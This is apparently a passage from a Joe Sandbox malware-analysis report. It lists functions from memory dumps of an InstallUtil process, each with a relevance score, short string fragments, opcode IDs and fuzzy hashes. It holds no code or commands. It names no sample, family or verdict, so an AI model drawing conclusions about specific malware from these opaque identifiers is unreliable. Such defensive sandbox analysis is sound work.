                                                              • API String ID: 0-1435242062
                                                              • Opcode ID: d01329d8a794156accb74285650c4a842493e23faf7c11a785cfdd26012f85dc
                                                              • Instruction ID: df58b7f51aef2ca4b5534baed1b6c34d73d9d579c34034fd56745b63ce59c920
                                                              • Opcode Fuzzy Hash: d01329d8a794156accb74285650c4a842493e23faf7c11a785cfdd26012f85dc
                                                              • Instruction Fuzzy Hash: 4F127A30A002099FCB94CFA8D984ADEBBF6FF48314F1585A9E955DB261D730EC45CB50
                                                              Function 029F8801 Relevance: 4.2, Strings: 3, Instructions: 491COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q$;]q
                                                              • API String ID: 0-1096896373
                                                              • Opcode ID: 67a1e722e24e53a1749c70e0abe55da4c3982779a06f1ae097bde10a44d025c5
                                                              • Instruction ID: d098d9fd6f655f293f986291d46a20eb7b4b609b5c5e41e607a62259eefcd663
                                                              • Opcode Fuzzy Hash: 67a1e722e24e53a1749c70e0abe55da4c3982779a06f1ae097bde10a44d025c5
                                                              • Instruction Fuzzy Hash: ACF16F713006018FDBE99A29C858739769EFF84709F1948BAE652CF3B5DB29CC82C751
                                                              Function 029F7808 Relevance: 3.2, Strings: 2, Instructions: 700COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q
                                                              • API String ID: 0-127220927
                                                              • Opcode ID: b9907b5c4ca7c238300673d4cce62112fe9afe7a207c6173c3700a586c12b434
                                                              • Instruction ID: 3a90213762ce8342aa845ec79e87cda19750a4d21460f6e60d64dd68e2ef8b2f
                                                              • Opcode Fuzzy Hash: b9907b5c4ca7c238300673d4cce62112fe9afe7a207c6173c3700a586c12b434
                                                              • Instruction Fuzzy Hash: 7F525074A00218CFEB559BA4C960B9EBBB7FF88301F1084A9D50A6B3A5DF345E49CF51
                                                              Function 029F56B0 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq
                                                              • API String ID: 0-4016896955
                                                              • Opcode ID: fb61ed7d3bee00d9017c1fe5c42407391647f67853f39809da65cbf5591ed661
                                                              • Instruction ID: 216db8c46f42255fd042c36a7a55e88e029c887801b116af23038abbcb24e8d5
                                                              • Opcode Fuzzy Hash: fb61ed7d3bee00d9017c1fe5c42407391647f67853f39809da65cbf5591ed661
                                                              • Instruction Fuzzy Hash: DBB1E3317042548FDB968F38C854B3A7BE6AF88314F568869EA46CB395DF34CC46CB90
                                                              Function 029F5C10 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$,aq
                                                              • API String ID: 0-2990736959
                                                              • Opcode ID: 751f490ed0f2efb91e314ba2919329e256e3ab0c77e73ad5b26f6efced4dd721
                                                              • Instruction ID: f08ab48d3e8052a1a01ad9d91f2909ed5aa103dda61ecf6d72f2417c745d99bf
                                                              • Opcode Fuzzy Hash: 751f490ed0f2efb91e314ba2919329e256e3ab0c77e73ad5b26f6efced4dd721
                                                              • Instruction Fuzzy Hash: 3E81D135B005059FCBD4DF68C488A6ABBF6FF89314BA68469D606DB365DB31EC01CB50
                                                              Function 066023E0 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q$LR]q
                                                              • API String ID: 0-3917262905
                                                              • Opcode ID: 02f0c76668547cd895d3712735de17c1f394758c14fbfc4ca47a9265f3b962db
                                                              • Instruction ID: feb15ee0b173168ddc81c044516653de489fa9a83ab90cd96c8324f8d91106d7
                                                              • Opcode Fuzzy Hash: 02f0c76668547cd895d3712735de17c1f394758c14fbfc4ca47a9265f3b962db
                                                              • Instruction Fuzzy Hash: 2F81A234B101058FDB49DF78C868A6F77BAEF88704B158469E506DB3A5DB30EE02CB95
                                                              Function 06609510 Relevance: 2.7, Strings: 2, Instructions: 209COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&]q$(aq
                                                              • API String ID: 0-1602648543
                                                              • Opcode ID: de4ca3b0864926bda7fa699b42c544e4073ea7186e470e02fd921913a21812c7
                                                              • Instruction ID: d6d4e0375645ff6c823b05b473bce0501fe795a2861ae4298c042f8ae53595ee
                                                              • Opcode Fuzzy Hash: de4ca3b0864926bda7fa699b42c544e4073ea7186e470e02fd921913a21812c7
                                                              • Instruction Fuzzy Hash: 24719F31F102198BEB59DFB9C8506EFBBB2AF88700F148529E405B7381DE34AD06CB91
                                                              Function 029F3428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq
                                                              • API String ID: 0-1488805882
                                                              • Opcode ID: e08b68d54fd8c0ceb52dad7b999b6f151442bb7492a3b7f95638f833a533ffdb
                                                              • Instruction ID: d37a2be232f4fbbcf11241caaf42beda4025cee4eb37331be7853992225394f2
                                                              • Opcode Fuzzy Hash: e08b68d54fd8c0ceb52dad7b999b6f151442bb7492a3b7f95638f833a533ffdb
                                                              • Instruction Fuzzy Hash: E7310431B003558BDFD9897A9A9423EB5DEABC0254F144979DA1AC3384DF7CCC0583A9
                                                              Function 029F0C8F Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: 43e0b05e1fc30b0f756c174be7d5d58878309a72eafaa950cf3c23f1510dc42f
                                                              • Instruction ID: 69319c841713076fff21c1e1fd3612837dda00d5c8f9b244e63d9f3bd13a4d7f
                                                              • Opcode Fuzzy Hash: 43e0b05e1fc30b0f756c174be7d5d58878309a72eafaa950cf3c23f1510dc42f
                                                              • Instruction Fuzzy Hash: 0822EA74A40219CFCB54EF64EA85A9DBBB1FF48314F1085A5D80AAB368EF705E85CF50
                                                              Function 029F0CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: 9ac47b0d63dc227926ad9f4cd5a8cc4db9298b3453c060288ad48cd1386aac57
                                                              • Instruction ID: 3d1bf2110aa49ddec523283bcac19f49ea17713d57d79e4dbcde527ca13eb878
                                                              • Opcode Fuzzy Hash: 9ac47b0d63dc227926ad9f4cd5a8cc4db9298b3453c060288ad48cd1386aac57
                                                              • Instruction Fuzzy Hash: BC22EA74A00219CFCB54EF64EA85A9DBBB5FF48314F1085A5D80AAB328EF705E85CF50
                                                              Function 029FA660 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q
                                                              • API String ID: 0-794736227
                                                              • Opcode ID: 5baf69a9ee5e704fa8721a6a9b8a4ea456ed63a4b259a6f96e6bbe98027aa215
                                                              • Instruction ID: 4d7a548ce45ca5dbc578e83b8bc096590f9c0a6eb7a6dbfa1a9cebefb0608620
                                                              • Opcode Fuzzy Hash: 5baf69a9ee5e704fa8721a6a9b8a4ea456ed63a4b259a6f96e6bbe98027aa215
                                                              • Instruction Fuzzy Hash: 3541D035B002448FCB559F79D854AAE7BFBAFC8711F144869EA0AD7391CE308C06CB90
                                                              Function 029FA828 Relevance: .4, Instructions: 407COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aaf4002c517a045963df96468c585ea17ce4aff9fc15e46a96bad06cfdb645b7
                                                              • Instruction ID: a289dad683d99559d32438a44ec70a7053cf7bfb0cdca9c4adbb816754939f20
                                                              • Opcode Fuzzy Hash: aaf4002c517a045963df96468c585ea17ce4aff9fc15e46a96bad06cfdb645b7
                                                              • Instruction Fuzzy Hash: 1CF13B75A002158FCB84CF6DC588AADBBF6FF88314B1A8469E509EB361DB35EC41CB54
                                                              Function 029F7450 Relevance: .2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ec2aeaeda3c8e624ba60a65266da2400a5baf1b8fbb4804ec8db83820aae65b
                                                              • Instruction ID: 1823021f8242cf7b9e00161b14cf674ef3d4d0745d11560805b5881c59f684f4
                                                              • Opcode Fuzzy Hash: 4ec2aeaeda3c8e624ba60a65266da2400a5baf1b8fbb4804ec8db83820aae65b
                                                              • Instruction Fuzzy Hash: 24712A34B042058FCB94DFACC898AAABBFAAF49714F1504A9EA15CB371DB71DC41CB51
                                                              Function 029FCED7 Relevance: .2, Instructions: 171COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50ecf0708dd011f8ec3a45df2dd2ddeae2b39a87c95c831aa0e9899a6daed49f
                                                              • Instruction ID: 0474b73d228b70b1fb207429c51ece375575ea4ef8f664e7960e84056f6eabcc
                                                              • Opcode Fuzzy Hash: 50ecf0708dd011f8ec3a45df2dd2ddeae2b39a87c95c831aa0e9899a6daed49f
                                                              • Instruction Fuzzy Hash: 2051D0359B1B138FC2082F21B5AD12BBB65FB4F367B046D54E06E96421CFB4906ACF14
                                                              Function 029FCEE8 Relevance: .2, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 832eeb1ad4d1dcc14d1645ca1988e59b72ac10a094ce4f89621568c779ddeb78
                                                              • Instruction ID: d1e5fd0039b254a8c2d1ef5abcc918110faeb2dbcb9af1201f1d8e94a0be733d
                                                              • Opcode Fuzzy Hash: 832eeb1ad4d1dcc14d1645ca1988e59b72ac10a094ce4f89621568c779ddeb78
                                                              • Instruction Fuzzy Hash: 9D51C2359B1B138FC2082B21B5AD02BBB65FB4F377B046D54E06E95425CF74906ACA14
                                                              Function 029FE2E9 Relevance: .2, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b720d711bdbd297b626cf4a1b92f4b704b278c15ec167d1fbae9b75a025c7c2
                                                              • Instruction ID: 082a07b83337fa841cf904609cc3ffa31fed0a30f267534322e0b7f5e6e0be8f
                                                              • Opcode Fuzzy Hash: 9b720d711bdbd297b626cf4a1b92f4b704b278c15ec167d1fbae9b75a025c7c2
                                                              • Instruction Fuzzy Hash: 77615574D01318CFDB14DFA5D954AAEBBB6FF88304F208528D809AB365DB799946CF00
                                                              Function 029FCD20 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fefe57aa38d08c41a1d1bf4fada86e38d507fc214e80054f8a1e452db783a608
                                                              • Instruction ID: c46b38bc518ffbc70f5d2cea93be1b93f22c6be515fac5db3472d4f545a1c051
                                                              • Opcode Fuzzy Hash: fefe57aa38d08c41a1d1bf4fada86e38d507fc214e80054f8a1e452db783a608
                                                              • Instruction Fuzzy Hash: 97519474E01208DFDB48DFAAD58499DBBF2FF89301F209169E819AB365DB31A905CF50
                                                              Function 0660DCC0 Relevance: .1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 85373d3d7523c6439d880f718e1b06669fce6023536dc778512ecc7e243c6781
                                                              • Instruction ID: d04f4da201747804dfc40f8f2dd3dc9638f5b77620fdeb73b06dc62748f686bf
                                                              • Opcode Fuzzy Hash: 85373d3d7523c6439d880f718e1b06669fce6023536dc778512ecc7e243c6781
                                                              • Instruction Fuzzy Hash: 03414932901219CFD744AFA1E45C7EFBBB1EB8A316F104825D116632E1CBB81A48CF91
                                                              Function 029F3908 Relevance: .1, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 548ccb121f2b7b138f6d07cfc71adb280bd68c374a5775f8381e016b11e0f47c
                                                              • Instruction ID: be996473ff31cd55b0f34c9b642fa75a0066e6aae5ee418fbcfd885052f6bfc5
                                                              • Opcode Fuzzy Hash: 548ccb121f2b7b138f6d07cfc71adb280bd68c374a5775f8381e016b11e0f47c
                                                              • Instruction Fuzzy Hash: 13519574E01208CFCB48DFA9D59099DBBF2FF89314B209469E809AB364DB75AD46CF50
                                                              Function 029FF0F9 Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c66bf47dc32a1d2dcd2ab8e9b28a9d4dd550d8604c4c091a8374d4f8358ac07
                                                              • Instruction ID: 63226988bbe9257492b263d868faf3e343df299cd4a287ec156d02bc57474ae5
                                                              • Opcode Fuzzy Hash: 2c66bf47dc32a1d2dcd2ab8e9b28a9d4dd550d8604c4c091a8374d4f8358ac07
                                                              • Instruction Fuzzy Hash: 8D51DE75E01228CFCBA4DF64C984BEDBBB2BB89305F1055A9D409A7390DB35AE85CF50
                                                              Function 029F9A73 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8706868128ccfc9783665d7fe990420654646b188e56ac441d603cd12fd0283c
                                                              • Instruction ID: 0244ffed35fcaad98e3175c8adc4402c2710c7259eaff58f4b45d17b1c689fcc
                                                              • Opcode Fuzzy Hash: 8706868128ccfc9783665d7fe990420654646b188e56ac441d603cd12fd0283c
                                                              • Instruction Fuzzy Hash: 1741BF31A04249DFEF91CFA8C844B9EBFB6FF89314F008456EA159B2A5D331E911CB60
                                                              Function 06609500 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b5a02f7665d63c096c333997c294a52d62ed6206577c9d27b66b20d21a7abdc
                                                              • Instruction ID: 9574d75b012e66beaed283a1e9249cf5716916c1140d965b5c193700630ac8a1
                                                              • Opcode Fuzzy Hash: 3b5a02f7665d63c096c333997c294a52d62ed6206577c9d27b66b20d21a7abdc
                                                              • Instruction Fuzzy Hash: 45417A71E10219DBEB14DFA5C880ADEF7F6BF84700F149629E415B7381DB70A946CB91
                                                              Function 06609A49 Relevance: .1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf1cda3184b2879f9508497f7d4057762b63f0dad427f5bf49ab9b04bef3a13f
                                                              • Instruction ID: c862598e95708b630c3cba058e63e6874a34ede3501288df6101ce9bcfe78778
                                                              • Opcode Fuzzy Hash: cf1cda3184b2879f9508497f7d4057762b63f0dad427f5bf49ab9b04bef3a13f
                                                              • Instruction Fuzzy Hash: 6341D074E00218CFDB44DFA9D5947EEBBB2BF49314F20912AD809A7394EB745A46CF50
                                                              Function 029FD7DE Relevance: .1, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33c184eea3a4c8f5e0de91a2d0cb5b8cd18cb64added12366f04d1ee4be19f5c
                                                              • Instruction ID: bc052f59245f2a333743d84cb340d6903dfb35d8e5b64d2e94dd0cfe708ec687
                                                              • Opcode Fuzzy Hash: 33c184eea3a4c8f5e0de91a2d0cb5b8cd18cb64added12366f04d1ee4be19f5c
                                                              • Instruction Fuzzy Hash: D54159B4D05208CFCB84DFA8D4946EDBBF2FF4A301F60991AD519AB254DB759842CF24
                                                              Function 029FD7FB Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1ea04aec3d67d8b59cf184719fd0470554f44174cd25ad1645cfac5cf94001d
                                                              • Instruction ID: 8bbbad147b28f88111d734bdf03836b8915de5febfb1eba88d669157834373ed
                                                              • Opcode Fuzzy Hash: f1ea04aec3d67d8b59cf184719fd0470554f44174cd25ad1645cfac5cf94001d
                                                              • Instruction Fuzzy Hash: D14155B0D05209CFCB81DFA8D4946EDBBB6FF4A301F60991AD509AB255DB74A842CF24
                                                              Function 06609A58 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4504423913.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: baec6c8c7648c17cd30d7e4429bed29f12d497c0a6c580a3a58ed6f5e272eb26
                                                              • Instruction ID: 0bf6dca6c3046e753966e2d53387b1545404e5e91a5cfa9f8b44afd85d0a27c6
                                                              • Opcode Fuzzy Hash: baec6c8c7648c17cd30d7e4429bed29f12d497c0a6c580a3a58ed6f5e272eb26
                                                              • Instruction Fuzzy Hash: 3241DE74E012088FDB48DFA9D5946EEBBF2BF49314F20912AD809A7394EB745A46CF50
                                                              Function 029FD77E Relevance: .1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdb2980a9f8b62921a423d90184e52c6cb864e0463c3f2f6ac40d54e2e45d270
                                                              • Instruction ID: 4aa2fbfb3c5d990d9ae8190bd01f7a8cfcdb54ceffb86d18886ff775bc25463f
                                                              • Opcode Fuzzy Hash: cdb2980a9f8b62921a423d90184e52c6cb864e0463c3f2f6ac40d54e2e45d270
                                                              • Instruction Fuzzy Hash: 964134B0D01208CFCB80DFA8D4946EDBBB2FF4A315F20991AD509AB254D7359842CF24
                                                              Function 029FD630 Relevance: .1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7173fd60129c42e207a101bf3bbdcb59aab5f568ddd14cd0c529d6dde6ba616d
                                                              • Instruction ID: 20b17ed87c6a94a7d8b0b106fbdf1b645eb724f05b6ccf48954a174ccc54c569
                                                              • Opcode Fuzzy Hash: 7173fd60129c42e207a101bf3bbdcb59aab5f568ddd14cd0c529d6dde6ba616d
                                                              • Instruction Fuzzy Hash: 3E4147B0D01208CBCB84DFAAD4446EEFBB2BF8A305F20D529D508BB255DB719841CF64
                                                              Function 029F4DD0 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b89d143a69549f577d51a2ec3a628d4bd4e7fa1e1b08ef09d20c2257c163f50
                                                              • Instruction ID: b8bf2689a944b970a5c63a48b0d9a247e5ba55674fd8564fbc713f64f74a5c5b
                                                              • Opcode Fuzzy Hash: 9b89d143a69549f577d51a2ec3a628d4bd4e7fa1e1b08ef09d20c2257c163f50
                                                              • Instruction Fuzzy Hash: 8E31AF3160020A9FCF459FA4D854AAF7BA6FF88321F105824FA159B295DF34CD66CBA0
                                                              Function 029F76E8 Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7d955041d857b738609bf996a74896efec8832d84e515269124daec69d5b132
                                                              • Instruction ID: eb959dbc13b0c6691bfdd80f3ae7a78069d3770ed91c5b0319233622ca53c8af
                                                              • Opcode Fuzzy Hash: c7d955041d857b738609bf996a74896efec8832d84e515269124daec69d5b132
                                                              • Instruction Fuzzy Hash: 0E21D0357202014BDBE41A7AC4946BEA69F9FC8658F284438DA06CB395EF29CC43D791
                                                              Function 029F76F8 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8e0c7d01097eae51712a2556e52c007afdea8739f646cb814992f1546590de8
                                                              • Instruction ID: 76cea487c2cf59228fec1c8e0419457094187318fa856efd8a82eadd9608f11a
                                                              • Opcode Fuzzy Hash: d8e0c7d01097eae51712a2556e52c007afdea8739f646cb814992f1546590de8
                                                              • Instruction Fuzzy Hash: 2E21BE383142114BDBE4266AC8947BEB6DF9FC8758F244438DA06CB3A4EF69CC42D791
                                                              Function 029FA819 Relevance: .1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 650903f1e55b6bc807b7b65d3baedb9c050528bd888041166d6fdf52d33b7c94
                                                              • Instruction ID: b25feab627812965e0c7247f3ad190e06a884bdd663c1dd9fcd71883566e03ff
                                                              • Opcode Fuzzy Hash: 650903f1e55b6bc807b7b65d3baedb9c050528bd888041166d6fdf52d33b7c94
